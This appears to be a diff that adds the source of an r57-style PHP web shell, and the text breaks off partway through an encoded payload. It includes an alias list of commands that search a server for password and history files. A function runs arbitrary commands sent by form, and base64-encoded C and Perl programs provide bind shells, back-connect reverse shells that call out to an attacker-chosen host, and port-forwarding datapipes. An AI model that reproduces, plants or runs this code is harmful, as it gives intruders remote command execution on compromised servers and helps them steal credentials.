+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  $handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
